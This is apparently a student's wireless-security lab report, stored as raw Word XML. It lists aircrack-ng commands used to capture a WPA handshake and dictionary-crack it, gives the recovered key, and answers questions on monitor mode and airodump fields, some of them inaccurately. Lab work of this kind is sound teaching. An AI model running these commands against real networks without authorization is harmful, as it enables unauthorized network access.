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A1B9" w14:textId="3EEB22F9" w:rsidR="00900664" w:rsidRPr="005B3163" w:rsidRDefault="00D7233A" w:rsidP="005B3163">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3163">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q1: </w:t>
      </w:r>
      <w:r w:rsidR="00900664" w:rsidRPr="005B3163">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Please answer the following questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711C12F7" w14:textId="73413267" w:rsidR="00900664" w:rsidRPr="00DD3E65" w:rsidRDefault="00900664" w:rsidP="00DD3E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3E65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Specify your target network ESSID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1088FC" w14:textId="5847AC1D" w:rsidR="00900664" w:rsidRPr="00DD3E65" w:rsidRDefault="00900664" w:rsidP="00DD3E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3E65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Write down all commands you have used to break into the WPA access point (output not required, enter only the commands).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B2B1D" w14:textId="5DB5E6CC" w:rsidR="00900664" w:rsidRPr="00DD3E65" w:rsidRDefault="00900664" w:rsidP="00DD3E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3E65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>What is the WPA key you have extracted? have you been able to associate to the network with respective key?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128F672E" w14:textId="77777777" w:rsidR="00DD3E65" w:rsidRDefault="00DD3E65" w:rsidP="00DD3E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103C6996" w14:textId="59D66FE4" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00DD3E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ESSID: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetnetwork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78AB5823" w14:textId="228ED3B0" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00DD3E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60611CD7" w14:textId="77777777" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00DD3E65">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C5421" w14:textId="07448914" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00DD3E65">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng start wlan0</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E65">
        <w:t xml:space="preserve"> (Enable Monitor mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7054184E" w14:textId="6B4B6F0C" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00DD3E65">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng check kill</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E65">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65354984" w14:textId="77777777" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00DD3E65">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (check monitor mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48523D6C" w14:textId="19049E10" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00DD3E65">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng wlan0mon</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E65">
        <w:t xml:space="preserve"> (Scan </w:t>
      </w:r>
      <w:r w:rsidR="0093305A">
        <w:t xml:space="preserve">available </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0093305A">
        <w:t>WiFI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD3E65">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B245D" w14:textId="2233BC72" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00DD3E65">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng -c 6 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> '' </w:t>
      </w:r>
      <w:r w:rsidR="00C12CE4">
        <w:t>E4:5F:01:0D:72:2A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -w ~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C12CE4">
        <w:t>WPAshakefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wlan0</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E65">
        <w:t xml:space="preserve">mon </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D136C2" w14:textId="742E216D" w:rsidR="00C12CE4" w:rsidRDefault="00C12CE4" w:rsidP="00DD3E65">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-ng -w rockyou.txt -b E4:5F:01:0D:72:2A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WPAshakefile.cap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66D9B4B1" w14:textId="045F8B0C" w:rsidR="001558D1" w:rsidRDefault="00C12CE4" w:rsidP="00C12CE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The WPA key</w:t>
      </w:r>
      <w:r w:rsidR="0063245B">
        <w:t xml:space="preserve"> is hedgehog. I can use it to connect the target WIFI. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FB8DD" w14:textId="7783E0AE" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="001558D1"/>
    <w:p w14:paraId="194F70B8" w14:textId="17A3FFEA" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00A40846"/>
    <w:p w14:paraId="099D68E9" w14:textId="1BB7DC9B" w:rsidR="001558D1" w:rsidRDefault="00570761" w:rsidP="00A40846">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q2: </w:t>
      </w:r>
      <w:r w:rsidR="00A40846" w:rsidRPr="00A40846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Which of the following specifications are true for an SSID? (Choose all that apply.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709E0C28" w14:textId="2373CF3F" w:rsidR="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="006B4FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00570761">
        <w:t>Up to 20 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4330D3" w14:textId="176D4A05" w:rsidR="006B4FDF" w:rsidRPr="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="006B4FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Up to 32 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E16887" w14:textId="7B64D182" w:rsidR="006B4FDF" w:rsidRPr="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="006B4FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Case sensitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C66B33" w14:textId="043260B5" w:rsidR="006B4FDF" w:rsidRPr="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="006B4FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Spaces are allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F3527" w14:textId="4C670C62" w:rsidR="001558D1" w:rsidRDefault="006B4FDF" w:rsidP="00A40846">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00570761">
        <w:t>Spaces are not allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D272B" w14:textId="77777777" w:rsidR="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="00A40846"/>
    <w:p w14:paraId="19E8AAF2" w14:textId="59520745" w:rsidR="001558D1" w:rsidRDefault="001558D1" w:rsidP="00A40846"/>
    <w:p w14:paraId="3AEDBE01" w14:textId="4D9F0155" w:rsidR="00386A86" w:rsidRDefault="00386A86" w:rsidP="00A40846"/>
    <w:p w14:paraId="6802F2F7" w14:textId="542FECCF" w:rsidR="00386A86" w:rsidRDefault="00386A86" w:rsidP="00A40846"/>
    <w:p w14:paraId="4D9C9D6F" w14:textId="0C509C2B" w:rsidR="00386A86" w:rsidRDefault="00386A86" w:rsidP="00A40846"/>
    <w:p w14:paraId="0B83E63B" w14:textId="5E241948" w:rsidR="00386A86" w:rsidRDefault="00386A86" w:rsidP="00A40846"/>
    <w:p w14:paraId="29EAD3AC" w14:textId="30C73245" w:rsidR="00386A86" w:rsidRDefault="00386A86" w:rsidP="00A40846"/>
    <w:p w14:paraId="64E0512A" w14:textId="0C9698C5" w:rsidR="00386A86" w:rsidRDefault="00386A86" w:rsidP="00A40846"/>
    <w:p w14:paraId="086F6F3F" w14:textId="360B87C6" w:rsidR="00386A86" w:rsidRDefault="00386A86" w:rsidP="00A40846"/>
    <w:p w14:paraId="73648022" w14:textId="77777777" w:rsidR="00386A86" w:rsidRDefault="00386A86" w:rsidP="00A40846"/>
    <w:p w14:paraId="6E84D824" w14:textId="4F7D594B" w:rsidR="00900664" w:rsidRPr="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q3: Monitor mode is one of the modes that 802.11 wireless cards can operate in, e.g., master, managed, ad-hoc, repeater, and mesh. What is monitor mode capable of? What are the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ifferences between monitor, master and managed mode?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BBB75B" w14:textId="77777777" w:rsidR="00206ED5" w:rsidRDefault="00206ED5" w:rsidP="00206ED5">
      <w:r>
        <w:t>In Monitor Mode, the Wireless Network Interface Controller can be able to capture all the packets in the air.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A8792" w14:textId="77761498" w:rsidR="001558D1" w:rsidRDefault="00206ED5" w:rsidP="00206ED5">
      <w:r>
        <w:t>The Managed mode is the default mode of the Wireless Interface Card that is used to connect Wireless Network (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WiFI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) where the card will only capture packets that have its MAC address as the destination MAC. Master Mode is just like the LAB we set up for the Raspberry Pi. It used to let the Device act as a Wireless Access point to provide Wireless access services and routing functionality to other wireless devices. The Modes mentioned above all use Wireless Technology but are used for different purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B91FA" w14:textId="4DEC218D" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="76CFF01E" w14:textId="77777777" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="7AA34BC8" w14:textId="26095461" w:rsidR="001558D1" w:rsidRPr="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Q4. </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Under what circumstances can WPA be cracked?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DF775" w14:textId="1AC68DE0" w:rsidR="00655F67" w:rsidRDefault="00242672" w:rsidP="001558D1">
      <w:r w:rsidRPr="00242672">
        <w:t>WPA can be cracked when</w:t>
      </w:r>
      <w:r w:rsidR="00831156">
        <w:t xml:space="preserve"> the 4-way authentication handshake packets are being captured</w:t>
      </w:r>
      <w:r w:rsidRPr="00242672">
        <w:t>. This is because when users initially connect to WIFI, the device will send the Connection Password to the AP for authentication purposes (4-way authentication Handshake).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> After Capture the </w:t>
      </w:r>
      <w:r w:rsidR="00831156">
        <w:t xml:space="preserve">Authentication </w:t>
      </w:r>
      <w:r>
        <w:t>Packets,</w:t>
      </w:r>
      <w:r w:rsidR="00831156">
        <w:t xml:space="preserve"> we can crack the password by using Dictionary Attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301CFDC0" w14:textId="7091682E" w:rsidR="00242672" w:rsidRDefault="00242672" w:rsidP="001558D1"/>
    <w:p w14:paraId="155694CA" w14:textId="3596C866" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="7492C1AD" w14:textId="3D1CF4C5" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="1AE70B33" w14:textId="2CA57101" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="61ED0628" w14:textId="5D1221B8" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="1BA46CFB" w14:textId="0DF5AA8F" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="249CED78" w14:textId="334ECCF1" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="711903CD" w14:textId="67B3CFE6" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="783B9147" w14:textId="2041521F" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="04F83686" w14:textId="41505C31" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="42ED8F67" w14:textId="2EA346D3" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="48E0CF6A" w14:textId="7381E946" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="59DF257A" w14:textId="60ADADAF" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="65DB2B02" w14:textId="240DD441" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="41948400" w14:textId="7998CB4A" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="75BBC72C" w14:textId="77777777" w:rsidR="00F52BEB" w:rsidRDefault="00F52BEB" w:rsidP="001558D1"/>
    <w:p w14:paraId="6B829BB1" w14:textId="57E9C672" w:rsidR="006B4FDF" w:rsidRDefault="006B4FDF" w:rsidP="001558D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q5: When you run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B4FDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> command, in your output you can see fields such as PWR, Beacons, etc. What is PWR? Answer in 1-2 sentences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162A36F6" w14:textId="77777777" w:rsidR="00D82879" w:rsidRDefault="00E07415" w:rsidP="001558D1">
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BSSID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the MAC address of the Access point. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B031AB0" w14:textId="6C8B3177" w:rsidR="00D82879" w:rsidRDefault="00E07415" w:rsidP="001558D1">
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PWR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the Single level reported by the Wireless Monitor NIC Card</w:t>
      </w:r>
      <w:r w:rsidR="00D82879">
        <w:t xml:space="preserve">, it can be used to check the distance between Wireless Scanner and Access point. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C9A3AB" w14:textId="642961BD" w:rsidR="00D82879" w:rsidRDefault="00D82879" w:rsidP="001558D1">
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RXQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00D82879">
        <w:t xml:space="preserve"> is referring to Receive Quality that is used to check whether the Connectivity is stable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and how many packet is successfully received by the Wireless Scanner</w:t>
      </w:r>
      <w:r w:rsidR="000E5BF3">
        <w:t xml:space="preserve"> in percentage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22978A9F" w14:textId="02F19DAA" w:rsidR="000E5BF3" w:rsidRDefault="000E5BF3" w:rsidP="001558D1">
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beacons</w:t>
      </w:r>
      <w:r w:rsidR="00F21EA7" w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F21EA7">
        <w:t xml:space="preserve"> R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">efer to the total number of announcements packets sent by the Access point. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF28990" w14:textId="55396C78" w:rsidR="00D82879" w:rsidRDefault="00F21EA7" w:rsidP="001558D1">
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># Data:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Number of captured data packets including data broadcast Packets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17031FD2" w14:textId="163455D8" w:rsidR="00F21EA7" w:rsidRDefault="00F21EA7" w:rsidP="001558D1">
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#/s:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> number of data packet per second measure over the last 10 seconds. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE0141" w14:textId="21CD9E92" w:rsidR="00F21EA7" w:rsidRDefault="00F21EA7" w:rsidP="001558D1">
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CH: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The WIFI Channel that the AP broadcasting. This is retrieved from the Beacons packet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684915C9" w14:textId="7EBC6C0D" w:rsidR="00F21EA7" w:rsidRDefault="00F21EA7" w:rsidP="001558D1">
      <w:r w:rsidRPr="00F21EA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MB</w:t>
      </w:r>
      <w:r>
        <w:t>: The Maximum speed supported by AP</w:t>
      </w:r>
      <w:r w:rsidR="00FA7290">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A17B3" w14:textId="7EAB3353" w:rsidR="00FA7290" w:rsidRPr="00FA7290" w:rsidRDefault="00FA7290" w:rsidP="001558D1">
      <w:r w:rsidRPr="00FA7290">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ENC: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The Encryption algorithm that AP in use. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003362A" w14:textId="77777777" w:rsidR="00FA7290" w:rsidRDefault="00FA7290" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00FA7290">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CIPHER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the Cipher detected, the one we receive is CCMP that normally come with WPA2 Encryption. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F4E21" w14:textId="54137E23" w:rsidR="000E5BF3" w:rsidRDefault="00FA7290" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00FA7290">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AUTH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA7290">
        <w:t>The authentication protocol used to authenticate users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADAD4BE" w14:textId="64502CAC" w:rsidR="00FA7290" w:rsidRDefault="00FA7290" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00FA7290">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESSID</w:t>
      </w:r>
      <w:r>
        <w:t>: The Wireless Network Name that broadcast by the APs</w:t>
      </w:r>
      <w:r w:rsidR="00E85B82">
        <w:t xml:space="preserve"> (The ESSID can be hidden)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04600999" w14:textId="21FA85AA" w:rsidR="00857467" w:rsidRDefault="00E85B82" w:rsidP="00FA7290">
      <w:r w:rsidRPr="00E85B82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>STATION</w:t>
      </w:r>
